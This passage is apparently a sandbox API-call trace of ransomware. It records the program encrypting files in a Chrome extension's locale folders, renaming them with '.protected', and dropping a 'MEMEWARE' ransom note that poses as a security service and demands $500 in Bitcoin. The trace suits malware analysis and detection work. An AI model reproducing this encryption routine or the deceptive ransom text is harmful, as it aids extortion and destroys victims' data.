(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.221] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.221] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.221] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.221] CloseHandle (hObject=0x164) returned 1 [0081.221] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.221] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0081.222] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0081.222] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0081.222] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0081.222] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0081.222] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr") returned 145 [0081.222] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0081.222] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0081.222] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\*") returned 147 [0081.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.222] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.222] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.222] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.222] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.222] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.222] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\.") returned 147 [0081.222] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.222] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.222] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.222] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.222] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.222] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.222] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.222] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\..") returned 148 [0081.222] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.223] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.223] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.223] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.223] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.223] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.223] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.223] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.223] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json") returned 159 [0081.223] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.223] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.223] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.223] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json") returned 159 [0081.224] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json") returned 159 [0081.224] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json") returned 159 [0081.224] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.224] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x28a, lpOverlapped=0x0) returned 1 [0081.226] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.226] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x28a, lpOverlapped=0x0) returned 1 [0081.226] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.226] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.226] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.227] CloseHandle (hObject=0x168) returned 1 [0081.227] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.protected") returned 169 [0081.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.protected")) returned 1 [0081.228] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.228] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.228] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\RESTORE_FILES.txt") returned 163 [0081.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.229] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.229] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.230] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.230] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.230] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.230] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.230] CloseHandle (hObject=0x164) returned 1 [0081.230] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.230] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0081.230] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0081.230] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0081.230] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0081.230] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0081.230] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk") returned 145 [0081.230] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0081.230] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0081.230] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\*") returned 147 [0081.230] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.231] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.231] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.231] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.231] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.231] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.231] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\.") returned 147 [0081.231] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.231] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.231] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.231] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.231] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.231] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.231] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.231] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\..") returned 148 [0081.231] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.231] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.231] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.231] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.231] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.231] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.231] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.231] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.232] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json") returned 159 [0081.232] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.232] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.232] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.232] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.233] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json") returned 159 [0081.233] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.233] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json") returned 159 [0081.233] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.233] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json") returned 159 [0081.233] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.233] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x315, lpOverlapped=0x0) returned 1 [0081.242] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffceb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.242] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x315, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x315, lpOverlapped=0x0) returned 1 [0081.242] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.242] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.243] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.243] CloseHandle (hObject=0x168) returned 1 [0081.243] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.protected") returned 169 [0081.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.protected")) returned 1 [0081.244] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.244] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.244] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\RESTORE_FILES.txt") returned 163 [0081.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.245] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.245] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.246] lstrlenA 